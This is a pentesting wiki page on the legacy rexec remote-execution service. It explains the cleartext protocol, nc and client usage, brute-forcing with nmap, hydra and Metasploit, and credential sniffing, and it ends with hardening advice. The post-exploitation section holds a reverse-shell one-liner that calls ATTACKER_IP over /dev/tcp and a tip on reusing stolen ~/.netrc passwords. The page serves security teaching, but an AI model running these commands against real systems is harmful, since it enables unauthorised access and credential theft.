# 512 - Pentesting Rexec {{#include ../banners/hacktricks-training.md}} ## Basic Information Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …). It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**. The protocol was defined in the early 1980’s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests. **Default Port:** TCP 512 (`exec`) ``` PORT STATE SERVICE 512/tcp open exec ``` > πŸ”₯ All traffic – including credentials – is transmitted **unencrypted**. Anyone with the ability to sniff the network can recover the username, password and command. ### Protocol quick-look 1. Client connects to TCP 512. 2. Client sends three **NUL-terminated** strings: * the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`), * the **username**, * the **password**. 3. A final NUL-terminated string with the **command** to execute is sent. 4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output. That means you can reproduce the exchange with nothing more than `echo -e` and `nc`: ```bash (echo -ne "0\0user\0password\0id\0"; cat) | nc 512 ``` If the credentials are valid you will receive the output of `id` straight back on the same connection. ### Manual usage with the client Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package: ```bash rexec -l user -p password "uname -a" ``` If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!). --- ## Enumeration & Brute-forcing ### [**Brute-force**](../generic-hacking/brute-force.md#rexec) ### Nmap ```bash nmap -p 512 --script rexec-info # Discover service banner and test for stdout port mis-configuration nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" ``` The `rexec-brute` NSE uses the protocol described above to try credentials very quickly . ### Hydra / Medusa / Ncrack ```bash hydra -L users.txt -P passwords.txt rexec:// -s 512 -t 8 ``` `hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer . `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way. ### Metasploit ``` use auxiliary/scanner/rservices/rexec_login set RHOSTS set USER_FILE users.txt set PASS_FILE passwords.txt run ``` The module will spawn a shell on success and store the credentials in the database . --- ## Sniffing credentials Because everything is clear-text, **network captures are priceless**. With a copy of the traffic you can extract creds without touching the target: ```bash tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \ awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command ``` (In Wireshark enable *Decode As …​* TCP 512 β†’ REXEC to view nicely-parsed fields.) --- ## Post-Exploitation tips * Commands run with the privileges of the supplied user. If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible. * Rexec ignores the user’s shell and executes the command via `/bin/sh -c `. You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells: ```bash rexec -l user -p pass 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' ``` * Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement. --- ## Hardening / Detection * **Do not expose rexec**; replace it with SSH. Virtually all modern *inetd* superservers comment the service out by default. * If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords. * Monitor for traffic to :512 and for `rexecd` process launches. A single packet capture is enough to detect a compromise. * Disable `rexec`, `rlogin`, `rsh` together – they share most of the same codebase and weaknesses. --- ## References * Nmap NSE `rexec-brute` documentation – [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html) * Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` – [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login) {{#include ../banners/hacktricks-training.md}}